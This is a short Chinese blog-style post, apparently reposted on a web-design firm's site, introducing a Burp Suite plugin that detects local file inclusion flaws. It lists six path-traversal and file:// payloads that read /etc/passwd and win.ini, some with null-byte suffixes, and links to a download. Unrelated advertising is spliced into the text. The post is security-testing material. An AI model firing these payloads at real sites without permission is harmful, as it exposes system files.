本地文件包含漏洞检测工具:Burp国产插件LFIscanner

LFI scanner checks是为了我自己为burp轻量级扫描器做的一个检测LFI漏洞插件,因为burp没有一个有效的检测LFI功能的,只能自己写一个插件了。

创新互联长期为上千余家客户提供的网站建设服务,团队从业经验10年,关注不同地域、不同群体,并针对不同对象提供差异化的产品和服务;打造开放共赢平台,与合作伙伴共同营造健康的互联网生态环境。为双湖企业提供专业的成都网站建设、成都做网站双湖网站改版等技术服务。拥有十载丰富建站经验和众多成功案例,为您定制开发。

先看下截图:

来对比下J2EESCAN里面附带的LFI探测

下面是安装上 LFI scanner checks

我使用的payload如下

../../../../../../../../../../../../../../../../etc/passwd%00.html

../../../../../../../../../../../../../../../../etc/passwd

file:///etc/passwd

file:///c:/windows/win.ini

../../../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../../../windows/win.ini%00.html

如果有好的建议,可以在评论中留言

下载地址

链接: http://pan.baidu.com/s/1gdfITIN 密码: 4fv7

新闻标题:本地文件包含漏洞检测工具:Burp国产插件LFIscanner
链接URL:http://www.mswzjz.com/qtweb/news22/194672.html

成都网站建设公司_创新互联,为您提供全网营销推广用户体验外贸建站网站维护Google静态网站

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联